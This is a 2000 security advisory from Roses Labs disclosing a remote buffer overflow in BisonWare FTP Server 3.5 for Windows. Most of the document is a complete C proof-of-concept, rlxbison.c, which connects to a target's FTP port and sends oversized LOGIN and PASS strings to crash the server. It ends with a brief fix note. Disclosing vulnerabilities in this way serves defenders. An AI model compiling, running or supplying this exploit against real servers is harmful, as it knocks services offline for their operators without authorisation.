Roses Labs Security Advisory
                ----------------------------

  Author: Conde Vampiro
  Roses Labs Advisory Code: RLA002
  Date: 2/29/2000.
  Software: BisonWare FTP Server V3.5
  Platform: Windows 9x/NT. 
  Risk: Remote buffer overflow, that allow
  to crash the FTP Server. (Maybe also be
  possible to execute arbitrary code.)

  ------------
  Introduction
  ------------

	Bison FTP Server is a FTP server that
  runs on windows platforms. An intruder can launch
  an attack that will crash the FTP server.

  ------
  Detail
  ------

	Sending a "LOGIN" & "PASSWORD" of 550 characters
  each, will crash the FTP Server. This is the error that
  the FTP will produce:

  "Exception EAccessViolation in module BISONFTP.EXE at 
   0A0D4858. Access vilation at address 0A0D5858. Read of 
   address 0A0D5858."

  ----
  Code 
  ----

	Warning: Neither the Roses Labs or the author accept
  any responsibility of the use of this code. This code will
  crash the FTP server.

------- CODE START -------

/*
 * FILE: rlxbison.c
 * CODER: Conde Vampiro.
 * DATE: 2/29/2000.
 * ABSTRACT: Remote DoS of BISON FTP Server 3.5
 *
 * Compile: gcc rlxbison.c -o rlbison
 *
 * Roses Labs / w00w00
 * http://www.roses-labs.com
 * Advanced Security Research.
*/

#include <stdio.h>
#include <sys/socket.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <unistd.h>

/* Defines */

#define MAX 551
#define MAXDATA 1024

/* Global variables */

int sock;
int i;
char datacrap[MAX];
char *temp;
char tempdata[MAXDATA];
char buf[MAXDATA];
struct hostent *host;
struct sockaddr_in KillFTP;

/* Prototypes */

unsigned long resolve(char *host_name);
char *crap(int num);

/* Main */

int main(int argc, char *argv[]) {

        if(argc < 2) {
                printf("Usage: %s <Host>\n", argv[0]);
                exit(-1);
        }
        KillFTP.sin_family=AF_INET;
        KillFTP.sin_addr.s_addr=resolve(argv[1]);
        if(!KillFTP.sin_addr.s_addr) {
                printf("Host Unkown: %s\n",argv[1]);
                exit(-1);
        }
        KillFTP.sin_port=htons(21);
        sock=socket(AF_INET, SOCK_STREAM, 0);
        if(sock < 0) {
                printf("Error creating socket!!\n");
                exit(-1);
        }
        if(!connect(sock,(struct sockaddr *)&KillFTP, sizeof(KillFTP))) {
                printf("Roses Labs Bison FTP Xploit\n");
                printf("Remote crashing code!!!\n");
                recv(sock,tempdata,sizeof(tempdata),0);
                sleep(1);
                recv(sock,tempdata,sizeof(tempdata),0);
                temp=crap(MAX);
                sprintf(buf,"LOGIN %s\n",temp);
                send(sock,buf,strlen(buf),0);
                sprintf(buf,"PASS %s\n",temp);
                send(sock,buf,strlen(buf),0);
                printf("Host %s crashed!!\n",argv[1]);
                exit(0);
        } else {
                printf("Couldn't connect to %s on port 21,\n", argv[1]);
                exit(-1);
        }
        if(close(sock)) {
                printf("Error closing socket!!\n");
                exit(-1);
        }
return(0);
}

/* Functions */

unsigned long resolve(char *host_name) {
        struct in_addr addr;
        struct hostent *host_nam;

        if((addr.s_addr = inet_addr(host_name)) == -1) {
        if(!(host_nam = gethostbyname(host_name))) return(0);
        memcpy((char *) &addr.s_addr, host_nam->h_addr, host_nam->h_length);
        }
        return(addr.s_addr);
}

char *crap(int num) {
        for(i=0;i<num;i++) {
                datacrap[i]='X';
        }
        return(datacrap);
}

/* w00w00 E0F */

------- CODE END -------

  ---	
  Fix
  ---

	This problem is fixed in V4.1 out soon.

  ----
  Note	
  ----

	This bug was found using Cyber Host 
  Auditor (CHA). CHA is a security tool coded by 
  The Roses Labs to discover in a easy way DoS &
  possible buffer overflows.

  Roses Labs / w00w00
  http://www.roses-labs.com
  Advanced Security Research.